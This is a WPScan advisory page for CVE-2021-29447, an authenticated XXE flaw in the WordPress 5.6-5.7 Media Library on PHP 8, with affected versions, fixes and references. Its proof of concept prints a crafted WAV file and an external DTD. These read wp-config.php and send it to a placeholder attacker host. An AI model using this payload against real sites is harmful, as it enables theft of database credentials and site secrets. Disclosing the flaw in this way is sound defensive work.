WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Vulnerabilities

WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8

Description

A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress used an audio parsing library called ID3 that was affected by an XML External Entity (XXE) vulnerability affecting PHP versions 8 and above.
This particular vulnerability could be triggered when parsing WAVE audio files.

Proof of Concept

payload.wav:

RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>>

xxe.dtd:

<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">

Affects WordPress

5.7
Fixed in version 5.7.1
5.6.2
Fixed in version 5.6.3
5.6.1
Fixed in version 5.6.3
5.6
Fixed in version 5.6.3
5.0.11
Fixed in version 5.0.12

References

CVE
CVE-2021-29447
URL
https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
URL
https://core.trac.wordpress.org/changeset/29378
URL
https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
URL
https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
URL
https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/
URL
https://hackerone.com/reports/1095645

YouTube Video

Classification

Type

XXE

OWASP top 10
A4: XML External Entities (XXE)
CWE
CWE-611

Miscellaneous

Original Researcher

SonarSource

Verified

Yes

WPVDB ID
cbbe6c17-b24e-4be4-8937-c78472a138b5

Timeline

Publicly Published

2021-04-15 (about 2 years ago)

Added

2021-04-15 (about 2 years ago)

Last Updated

2021-05-19 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin